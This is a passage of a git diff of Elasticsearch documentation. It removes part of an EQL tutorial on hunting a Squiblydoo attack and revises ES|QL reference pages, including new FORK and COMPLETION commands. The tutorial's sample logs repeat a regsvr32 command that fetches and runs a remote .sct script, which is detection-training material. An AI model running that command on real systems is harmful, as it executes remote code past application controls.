```txt - health status index docs.count - yellow open .ds-my-data-stream-2099.12.07-000001 150 - ``` - - - -## Get a count of regsvr32 events [eql-ex-get-a-count-of-regsvr32-events] - -First, get a count of events associated with a `regsvr32.exe` process: - -```console -GET /my-data-stream/_eql/search?filter_path=-hits.events <1> -{ - "query": """ - any where process.name == "regsvr32.exe" <2> - """, - "size": 200 <3> -} -``` - -1. `?filter_path=-hits.events` excludes the `hits.events` property from the response. This search is only intended to get an event count, not a list of matching events. -2. Matches any event with a `process.name` of `regsvr32.exe`. -3. Returns up to 200 hits for matching events. - - -The response returns 143 related events. - -```console-result -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 143, - "relation": "eq" - } - } -} -``` - - -## Check for command line artifacts [eql-ex-check-for-command-line-artifacts] - -`regsvr32.exe` processes were associated with 143 events. But how was `regsvr32.exe` first called? And who called it? `regsvr32.exe` is a command-line utility. Narrow your results to processes where the command line was used: - -```console -GET /my-data-stream/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" and process.command_line.keyword != null - """ -} -``` - -The query matches one event with an `event.type` of `creation`, indicating the start of a `regsvr32.exe` process. Based on the event’s `process.command_line` value, `regsvr32.exe` used `scrobj.dll` to register a script, `RegSvr32.sct`. This fits the behavior of a Squiblydoo attack. - -```console-result -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - } - ] - } -} -``` - - -## Check for malicious script loads [eql-ex-check-for-malicious-script-loads] - -Check if `regsvr32.exe` later loads the `scrobj.dll` library: - -```console -GET /my-data-stream/_eql/search -{ - "query": """ - library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll" - """ -} -``` - -The query matches an event, confirming `scrobj.dll` was loaded. - -```console-result -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - } - ] - } -} -``` - - -## Determine the likelihood of success [eql-ex-detemine-likelihood-of-success] - -In many cases, attackers use malicious scripts to connect to remote servers or download other files. Use an [EQL sequence query](/reference/query-languages/eql/eql-syntax.md#eql-sequences) to check for the following series of events: - -1. A `regsvr32.exe` process -2. A load of the `scrobj.dll` library by the same process -3. Any network event by the same process - -Based on the command line value seen in the previous response, you can expect to find a match. However, this query isn’t designed for that specific command. Instead, it looks for a pattern of suspicious behavior that’s generic enough to detect similar threats. - -```console -GET /my-data-stream/_eql/search -{ - "query": """ - sequence by process.pid - [process where process.name == "regsvr32.exe"] - [library where dll.name == "scrobj.dll"] - [network where true] - """ -} -``` - -The query matches a sequence, indicating the attack likely succeeded. - -```console-result -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - }, - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - }, - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "EF5MJXMBMk1dGnErnBa9", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573238680000, - "destination": { - "address": "151.101.48.133", - "port": "443" - }, - "source": { - "address": "192.168.162.134", - "port": "50505" - }, - "event": { - "category": "network" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - }, - "network": { - "protocol": "tcp", - "direction": "outbound" - } - } - } - ] - } - ] - } -} -``` - diff --git a/docs/reference/query-languages/esql.md b/docs/reference/query-languages/esql.md index 034794af7d8e9..df3a502bdd33f 100644 --- a/docs/reference/query-languages/esql.md +++ b/docs/reference/query-languages/esql.md @@ -2,22 +2,48 @@ navigation_title: "{{esql}}" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-language.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-getting-started.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-using.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-examples.html +products: + - id: elasticsearch --- # {{esql}} reference [esql-language] -:::{note} -This section provides detailed **reference information** about the {{esql}} language, including syntax, functions, and operators. +**Elasticsearch Query Language ({{esql}})** is a piped query language for filtering, transforming, and analyzing data. -For overview, conceptual, and getting started information, refer to the [{{esql}} language overview](docs-content://explore-analyze/query-filter/languages/esql.md) in the **Explore and analyze** section. -::: +## What's {{esql}}? [_the_esql_compute_engine] -{{esql}} is a piped query language for exploring and analyzing data in {{es}}. It is designed to be easy to use and understand, while also being powerful enough to handle complex data processing. +You can author {{esql}} queries to find specific events, perform statistical analysis, and create visualizations. It supports a wide range of commands, functions, and operators to perform various data operations, such as filter, aggregation, time-series analysis, and more. It initially supported a subset of the features available in Query DSL, but it is rapidly evolving with every {{serverless-full}} and Stack release. -This reference section provides detailed technical information about {{esql}} features, syntax, and behavior: +{{esql}} is designed to be easy to read and write, making it accessible for users with varying levels of technical expertise. It is particularly useful for data analysts, security professionals, and developers who need to work with large datasets in Elasticsearch. + +## How does it work? [search-analyze-data-esql] + +{{esql}} uses pipes (`|`) to manipulate and transform data in a step-by-step fashion. This approach allows you to compose a series of operations, where the output of one operation becomes the input for the next, enabling complex data transformations and analysis. + +Here's a simple example of an {{esql}} query: + +```esql +FROM sample_data +| SORT @timestamp DESC +| LIMIT 3 +``` + +Note that each line in the query represents a step in the data processing pipeline: +- The `FROM` clause specifies the index or data stream to query +- The `SORT` clause sorts the data by the `@timestamp` field in descending order +- The `LIMIT` clause restricts the output to the top 3 results + +### User interfaces + +You can interact with {{esql}} in two ways: + +- **Programmatic access**: Use {{esql}} syntax with the {{es}} `_query` endpoint. + - Refer to [](esql/esql-rest.md) + +- **Interactive interfaces**: Work with {{esql}} through Elastic user interfaces including Kibana Discover, Dashboards, Dev Tools, and analysis tools in Elastic Security and Observability. + - Refer to [Using {{esql}} in {{kib}}](docs-content://explore-analyze/query-filter/languages/esql-kibana.md). -* [Syntax reference](esql/esql-syntax-reference.md): Learn the basic syntax of commands, functions, and operators -* [Advanced workflows](esql/esql-advanced.md): Learn how to handle more complex tasks with these guides, including how to extract, transform, and combine data from multiple indices -* [Types and fields](esql/esql-types-and-fields.md): Learn about how {{esql}} handles different data types and special fields -* [Limitations](esql/limitations.md): Learn about the current limitations of {{esql}} -* [Examples](esql/esql-examples.md): Explore some example queries \ No newline at end of file diff --git a/docs/reference/query-languages/esql/README.md b/docs/reference/query-languages/esql/README.md index 8e0d1a3835d4b..67613be559289 100644 --- a/docs/reference/query-languages/esql/README.md +++ b/docs/reference/query-languages/esql/README.md @@ -105,16 +105,95 @@ To help differentiate between the static and generated content, the generated co % This is generated by ESQL's AbstractFunctionTestCase. Do no edit it. See ../README.md for how to regenerate it. ``` +## Version differentiation in Docs V3 + +> [!IMPORTANT] +> Starting with 9.0, we no longer publish separate documentation branches for every minor release (`9.0`, `9.1`, `9.2`, etc.). +> This means there won't be a different page for `9.1`, `9.2`, and so on. Instead, all changes landing in subsequent minor releases **will appear on the same page**. + +Because we now publish just one docs set off of the `main` branch, we use the [`applies_to` metadata](https://elastic.github.io/docs-builder/syntax/applies/) to differentiate features and their availability across different versions. This is a [cumulative approach](https://elastic.github.io/docs-builder/contribute/#cumulative-docs): instead of creating separate pages for each product and release, we update a **single page** with product- and version-specific details over time. + +`applies_to` allows us to clearly communicate when features are introduced, when they transition from preview to GA, and which versions support specific functionality. + +This metadata accepts a lifecycle and an optional version. + +### Functions and operators + +Use the `@FunctionAppliesTo` annotation within the `@FunctionInfo` annotation on function and operator classes to specify the lifecycle and version for functions and operators. + +For example, to indicate that a function is in technical preview and applies to version 9.0.0, you would use: + +```java +@FunctionInfo( + returnType = "boolean", + appliesTo = { + @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.PREVIEW, version = "9.0.0") + }, + ... +) +``` + +When a feature evolves from preview in `9.0` to GA in `9.2`, add a new entry alongside the existing preview entry and remove the `preview = true` boolean: + +```java +@FunctionInfo( + returnType = "boolean", + preview = false, // the preview boolean can be removed (or flipped to false) when the function becomes GA + appliesTo = { + @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.PREVIEW, version = "9.0.0"), + @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.2.0") + }, + ... +) +``` + +We updated [`DocsV3Support.java`](https://github.com/elastic/elasticsearch/blob/main/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java) to generate the `applies_to` metadata correctly for functions and operators. + +### Inline `applies_to` metadata + +Use [inline annotations](https://elastic.github.io/docs-builder/syntax/applies/#inline-annotations) to specify `applies_to` metadata in descriptions, parameter lists, etc. + +For example, the second item in this list is in technical preview as of version 9.2: + +```markdown +- Item 1 +- Item 2 {applies_to}`stack: preview 9.2.` +``` + +### Key rules + +1. **Use the `preview = true` boolean** for any tech preview feature - this is required for the Kibana inline docs + - **Remove `preview = true`** only when the feature becomes GA on serverless and is _definitely_ going GA in the next minor release +2. **Never delete `appliesTo` entries** - only add new ones as features evolve from preview to GA +3. **Use specific versions** (`9.0.0`, `9.1.0`) when known, or just `PREVIEW` without a version if timing is uncertain +4. **Add `applies_to` to examples** where necessary + +> [!IMPORTANT] +> We don't use `applies_to` in the legacy asciidoc system for 8.x and earlier versions. + +### Supported lifecycles + +- `PREVIEW` - Feature is in technical preview +- `GA` - Feature is generally available +- `DEPRECATED` - Feature is deprecated and will be removed in a future release +- `UNAVAILABLE` - Feature is not available in the current version, but may be available in future releases + +> [!NOTE] +> Unreleased version information is automatically sanitized in the docs build output. For example, say you specify `preview 9.3.0`: +> - Before `9.3.0` is released, the live documentation will display "Planned for a future release" instead of the specific version number. +> - This will be updated automatically when the version is released. + ## Tutorials ### Adding a new command When adding a new command, for example adding the `CHANGE_POINT` command, do the following: 1. Create a new file in the `_snippets/commands/layout` directory with the name of the command, for example `change_point.md`. -2. Add the content for the command to the file. See other files in this directory for examples. -3. Add the command to the list in `_snippets/lists/processing-commands.md`. -4. Add an include directive to the `commands/processing-commands.md` file to include the new command. -5. Add tested examples to the `_snippets/commands/examples` directory. See below for details. +2. Ensure to specify what versions the command applies to. See [Version differentiation in Docs V3](#version-differentiation-in-docs-v3) for details. [Example PR](https://github.com/elastic/elasticsearch/pull/130314/files#diff-0ab90b6202c5d9eeea75dc95a7cb71dc4d720230342718bff887816771a5a803R3-R6). +3. Add the content for the command to the file. See other files in this directory for examples. +4. Add the command to the list in `_snippets/lists/processing-commands.md`. +5. Add an include directive to the `commands/processing-commands.md` file to include the new command. +6. Add tested examples to the `_snippets/commands/examples` directory. See below for details. ### Adding examples to commands diff --git a/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleFork.md b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleFork.md new file mode 100644 index 0000000000000..c4752cb9648c6 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleFork.md @@ -0,0 +1,14 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +```esql +FROM employees +| FORK ( WHERE emp_no == 10001 ) + ( WHERE emp_no == 10002 ) +| KEEP emp_no, _fork +| SORT emp_no +``` + +| emp_no:integer | _fork:keyword | +| --- | --- | +| 10001 | fork1 | +| 10002 | fork2 | diff --git a/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleForkWithStats.md b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleForkWithStats.md new file mode 100644 index 0000000000000..d72ea42b3106f --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleForkWithStats.md @@ -0,0 +1,19 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +```esql +FROM books METADATA _score +| WHERE author:"Faulkner" +| EVAL score = round(_score, 2) +| FORK (SORT score DESC, author | LIMIT 5 | KEEP author, score) + (STATS total = COUNT(*)) +| SORT _fork, score DESC, author +``` + +| author:text | score:double | _fork:keyword | total:long | +| --- | --- | --- | --- | +| William Faulkner | 2.39 | fork1 | null | +| William Faulkner | 2.39 | fork1 | null | +| Colleen Faulkner | 1.59 | fork1 | null | +| Danny Faulkner | 1.59 | fork1 | null | +| Keith Faulkner | 1.59 | fork1 | null | +| null | null | fork2 | 18 | diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md b/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md index da7a8497e8d6b..3aa8810497aba 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md @@ -1,14 +1,12 @@ -## `CHANGE_POINT` [esql-change_point] - -:::{note} -The `CHANGE_POINT` command requires a [platinum license](https://www.elastic.co/subscriptions). -::: - ```yaml {applies_to} serverless: preview stack: preview 9.1.0 ``` +:::{note} +The `CHANGE_POINT` command requires a [platinum license](https://www.elastic.co/subscriptions). +::: + `CHANGE_POINT` detects spikes, dips, and change points in a metric. **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/completion.md b/docs/reference/query-languages/esql/_snippets/commands/layout/completion.md new file mode 100644 index 0000000000000..cf1ade8d3c6f0 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/completion.md @@ -0,0 +1,105 @@ + +```yaml {applies_to} +serverless: preview +stack: preview 9.1.0 +``` + +The `COMPLETION` command allows you to send prompts and context to a Large Language Model (LLM) directly within your ES|QL queries, to perform text generation tasks. + +**Syntax** + +```esql +COMPLETION [column =] prompt WITH inference_id +``` + +**Parameters** + +`column` +: (Optional) The name of the output column containing the LLM's response. + If not specified, the results will be stored in a column named `completion`. + If the specified column already exists, it will be overwritten with the new results. + +`prompt` +: The input text or expression used to prompt the LLM. + This can be a string literal or a reference to a column containing text. + +`inference_id` +: The ID of the [inference endpoint](docs-content://explore-analyze/elastic-inference/inference-api.md) to use for the task. + The inference endpoint must be configured with the `completion` task type. + +**Description** + +The `COMPLETION` command provides a general-purpose interface for +text generation tasks using a Large Language Model (LLM) in ES|QL. + +`COMPLETION` supports a wide range of text generation tasks. Depending on your +prompt and the model you use, you can perform arbitrary text generation tasks +including: + +- Question answering +- Summarization +- Translation +- Content rewriting +- Creative generation + +**Requirements** + +To use this command, you must deploy your LLM model in Elasticsearch as +an [≈inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the +task type `completion`. + +**Examples** + +Use the default column name (results stored in `completion` column): + +```esql +ROW question = "What is Elasticsearch?" +| COMPLETION question WITH test_completion_model +| KEEP question, completion +``` + +| question:keyword | completion:keyword | +|------------------------|-------------------------------------------| +| What is Elasticsearch? | A distributed search and analytics engine | + +Specify the output column (results stored in `answer` column): + +```esql +ROW question = "What is Elasticsearch?" +| COMPLETION answer = question WITH test_completion_model +| KEEP question, answer +``` + +| question:keyword | answer:keyword | +| --- | --- | +| What is Elasticsearch? | A distributed search and analytics engine | + +Summarize the top 10 highest-rated movies using a prompt: + +```esql +FROM movies +| SORT rating DESC +| LIMIT 10 +| EVAL prompt = CONCAT( + "Summarize this movie using the following information: \n", + "Title: ", title, "\n", + "Synopsis: ", synopsis, "\n", + "Actors: ", MV_CONCAT(actors, ", "), "\n", + ) +| COMPLETION summary = prompt WITH test_completion_model +| KEEP title, summary, rating +``` + + +| title:keyword | summary:keyword | rating:double | +| --- | --- | --- | +| The Shawshank Redemption | A tale of hope and redemption in prison. | 9.3 | +| The Godfather | A mafia family's rise and fall. | 9.2 | +| The Dark Knight | Batman battles the Joker in Gotham. | 9.0 | +| Pulp Fiction | Interconnected crime stories with dark humor. | 8.9 | +| Fight Club | A man starts an underground fight club. | 8.8 | +| Inception | A thief steals secrets through dreams. | 8.8 | +| The Matrix | A hacker discovers reality is a simulation. | 8.7 | +| Parasite | Class conflict between two families. | 8.6 | +| Interstellar | A team explores space to save humanity. | 8.6 | +| The Prestige | Rival magicians engage in dangerous competition. | 8.5 | diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md b/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md index 79dd91b9f1800..da9eebcbfc7eb 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md @@ -1,4 +1,7 @@ -## `DISSECT` [esql-dissect] +```yaml {applies_to} +serverless: ga +stack: ga +``` `DISSECT` enables you to [extract structured data out of a string](/reference/query-languages/esql/esql-process-data-with-dissect-grok.md). diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md b/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md index 4f383d4f0f237..32aabf25278c9 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md @@ -1,4 +1,7 @@ -## `DROP` [esql-drop] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `DROP` processing command removes one or more columns. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md b/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md index f33491d447482..854f7d5285481 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md @@ -1,4 +1,7 @@ -## `ENRICH` [esql-enrich] +```yaml {applies_to} +serverless: ga +stack: ga +``` `ENRICH` enables you to add data from existing indices as new columns using an enrich policy. @@ -19,7 +22,7 @@ ENRICH policy [ON match_field] [WITH [new_name1 = ]field1, [new_name2 = ]field2, `mode` : The mode of the enrich command in cross cluster {{esql}}. - See [enrich across clusters](docs-content://explore-analyze/query-filter/languages/esql-cross-clusters.md#ccq-enrich). + See [enrich across clusters](/reference/query-languages/esql/esql-cross-clusters.md#ccq-enrich). `match_field` : The match field. `ENRICH` uses its value to look for records in the enrich diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md b/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md index cd10448444ebd..a8a39adec2dc5 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md @@ -1,4 +1,7 @@ -## `EVAL` [esql-eval] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `EVAL` processing command enables you to append new columns with calculated values. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/fork.md b/docs/reference/query-languages/esql/_snippets/commands/layout/fork.md new file mode 100644 index 0000000000000..559afacc5940e --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/fork.md @@ -0,0 +1,55 @@ +```yaml {applies_to} +serverless: preview +stack: preview 9.1.0 +``` + +The `FORK` processing command creates multiple execution branches to operate +on the same input data and combines the results in a single output table. + +**Syntax** + +```esql +FORK ( ) ( ) ... ( ) +``` + +**Description** + +The `FORK` processing command creates multiple execution branches to operate +on the same input data and combines the results in a single output table. A discriminator column (`_fork`) is added to identify which branch each row came from. + +**Branch identification:** +- The `_fork` column identifies each branch with values like `fork1`, `fork2`, `fork3` +- Values correspond to the order branches are defined +- `fork1` always indicates the first branch + +**Column handling:** +- `FORK` branches can output different columns +- Columns with the same name must have the same data type across all branches +- Missing columns are filled with `null` values + +**Row ordering:** +- `FORK` preserves row order within each branch +- Rows from different branches may be interleaved +- Use `SORT _fork` to group results by branch + +::::{note} +`FORK` branches default to `LIMIT 1000` if no `LIMIT` is provided. +:::: + +**Limitations** + +- `FORK` supports at most 8 execution branches. +- Using remote cluster references and `FORK` is not supported. +- Using more than one `FORK` command in a query is not supported. + +**Examples** + +In the following example, each `FORK` branch returns one row. +Notice how `FORK` adds a `_fork` column that indicates which row the branch originates from: + +:::{include} ../examples/fork.csv-spec/simpleFork.md + +The next example, returns total number of rows that match the query along with +the top five rows sorted by score. + +:::{include} ../examples/fork.csv-spec/simpleForkWithStats.md diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/from.md b/docs/reference/query-languages/esql/_snippets/commands/layout/from.md index 45dce9136a029..6a5d6c2387d19 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/from.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/from.md @@ -1,4 +1,7 @@ -## `FROM` [esql-from] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `FROM` source command returns a table with data from a data stream, index, or alias. @@ -56,14 +59,14 @@ FROM ``` Use comma-separated lists or wildcards to -[query multiple data streams, indices, or aliases](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md): +[query multiple data streams, indices, or aliases](/reference/query-languages/esql/esql-multi-index.md): ```esql FROM employees-00001,other-employees-* ``` Use the format `:` to -[query data streams and indices on remote clusters](docs-content://explore-analyze/query-filter/languages/esql-cross-clusters.md): +[query data streams and indices on remote clusters](/reference/query-languages/esql/esql-cross-clusters.md): ```esql FROM cluster_one:employees-00001,cluster_two:other-employees-* diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md b/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md index 6397eea898469..313eb8c2ce502 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md @@ -1,4 +1,7 @@ -## `GROK` [esql-grok] +```yaml {applies_to} +serverless: ga +stack: ga +``` `GROK` enables you to [extract structured data out of a string](/reference/query-languages/esql/esql-process-data-with-dissect-grok.md). diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md b/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md index 3f2a357d037eb..2c074712e3151 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md @@ -1,4 +1,7 @@ -## `KEEP` [esql-keep] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `KEEP` processing command enables you to specify what columns are returned and the order in which they are returned. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md b/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md index 9bc8d0d86c096..c0646dd782114 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md @@ -1,4 +1,7 @@ -## `LIMIT` [esql-limit] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `LIMIT` processing command enables you to limit the number of rows that are returned. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md b/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md index da99cc69c031a..0ff2232e266cb 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md @@ -1,5 +1,3 @@ -## `LOOKUP JOIN` [esql-lookup-join] - ```yaml {applies_to} stack: preview 9.0.0, ga 9.1.0 ``` @@ -42,6 +40,9 @@ results, the output will contain one row for each matching combination. For important information about using `LOOKUP JOIN`, refer to [Usage notes](../../../../esql/esql-lookup-join.md#usage-notes). :::: +:::{include} ../types/lookup-join.md +::: + **Examples** **IP Threat correlation**: This query would allow you to see if any source diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md b/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md index 3e204a2a3d1be..ce615913ff322 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md @@ -1,12 +1,7 @@ -## `MV_EXPAND` [esql-mv_expand] - -::::{warning} -This functionality is in technical preview and may be -changed or removed in a future release. Elastic will work to fix any -issues, but features in technical preview are not subject to the support -SLA of official GA features. -:::: - +```yaml {applies_to} +serverless: preview +stack: preview +``` The `MV_EXPAND` processing command expands multivalued columns into one row per value, duplicating other columns. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md b/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md index 5bcade39660e7..3b3648add7b9e 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md @@ -1,4 +1,7 @@ -## `RENAME` [esql-rename] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `RENAME` processing command renames one or more columns. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/row.md b/docs/reference/query-languages/esql/_snippets/commands/layout/row.md index ebbede74ab44d..ce28abccfae90 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/row.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/row.md @@ -1,4 +1,7 @@ -## `ROW` [esql-row] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `ROW` source command produces a row with one or more columns with values that you specify. This can be useful for testing. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md b/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md index 07d95a31bbcf3..f0ae9e0d37cff 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md @@ -1,5 +1,3 @@ -## `SAMPLE` [esql-sample] - ```yaml {applies_to} serverless: preview stack: preview 9.1.0 diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/show.md b/docs/reference/query-languages/esql/_snippets/commands/layout/show.md index 04782a8cc990b..0083282e68610 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/show.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/show.md @@ -1,4 +1,7 @@ -## `SHOW` [esql-show] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `SHOW` source command returns information about the deployment and its capabilities. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md b/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md index 61ddd45fc1ff2..63223a0dfa15b 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md @@ -1,4 +1,7 @@ -## `SORT` [esql-sort] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `SORT` processing command sorts a table on one or more columns. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md b/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md index c8a5899f6c5ef..4f694b9db59d0 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md @@ -1,4 +1,7 @@ -## `STATS` [esql-stats-by] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `STATS` processing command groups rows according to a common value and calculates one or more aggregated values over the grouped rows. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/where.md b/docs/reference/query-languages/esql/_snippets/commands/layout/where.md index 5038ebd647ce1..1fed1b2cf98d9 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/where.md +++ 